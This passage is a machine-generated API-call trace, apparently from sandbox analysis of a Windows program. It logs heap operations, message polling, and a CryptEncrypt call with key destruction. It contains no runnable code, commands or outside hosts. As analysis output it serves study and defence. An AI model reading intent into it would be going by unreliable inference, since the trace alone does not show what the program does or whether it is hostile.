hHeap=0x25c0000) returned 1 [0208.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0208.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0208.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0208.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0208.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0208.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0208.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0208.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0208.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0208.384] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0208.384] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x34aa5f8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0208.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0208.384] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0208.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0208.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0208.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0208.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0208.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0208.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0208.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0208.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0208.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0208.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0208.385] CryptEncrypt (in: hKey=0xaa5660, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24b1738*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x8 | out: pbData=0x24b1738*, pdwDataLen=0x8bef68*=0x8) returned 1 [0208.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0060 [0208.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0208.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0208.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0208.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0208.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0208.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0208.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0208.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0208.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0208.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0208.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0208.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0208.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0208.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0208.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0208.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0208.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0208.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0208.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0208.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0208.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0208.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0208.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0208.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0208.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0208.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0208.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0208.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0208.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0208.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0208.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0208.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0208.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0208.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0208.392] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0208.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0208.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0208.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0208.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0208.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0208.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0208.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0208.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0208.393] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.393] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0208.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0208.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0208.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0208.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0208.393] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0208.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0208.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0208.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0208.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0208.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0208.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0208.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0208.394] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0208.394] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0208.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0208.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0208.394] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0208.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0208.394] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0208.394] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0208.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0208.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0208.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0208.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0208.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0208.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0208.395] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0208.395] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0208.395] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0208.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0208.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0208.395] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0208.395] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0208.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0208.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0208.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0208.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0208.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0208.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0208.395] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0208.395] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0208.395] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0208.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0208.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0208.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0208.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0208.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0208.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0208.396] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0208.396] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0208.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0208.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0208.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0208.396] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0208.396] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0208.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0208.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0208.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0208.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0208.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0208.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0208.396] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0208.396] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0208.397] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0208.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0208.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0208.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0208.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0208.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0208.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0208.397] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0208.397] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0208.397] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0208.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0208.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0208.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0208.397] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0208.397] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.397] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0208.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0208.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0208.398] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0208.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0208.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0208.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0208.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0208.399] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0208.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0208.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0208.399] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0208.399] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0208.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0208.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0208.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0208.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0208.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0208.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0208.399] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0208.399] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0208.399] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0208.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0208.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0208.400] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0208.400] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0208.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0208.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0208.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0208.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0208.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0208.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0208.400] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0208.400] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0208.400] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0208.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0208.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0208.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0208.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0208.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0208.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0208.400] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0208.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0208.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0208.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0208.401] CryptDestroyKey (hKey=0xaa5660) returned 1 [0208.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0208.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0208.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0208.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0208.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0208.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0208.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0208.401] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0208.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0208.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0208.401] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0208.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0208.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0208.402] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0208.402] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0208.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0208.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0208.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0208.402] RtlAllocateHeap 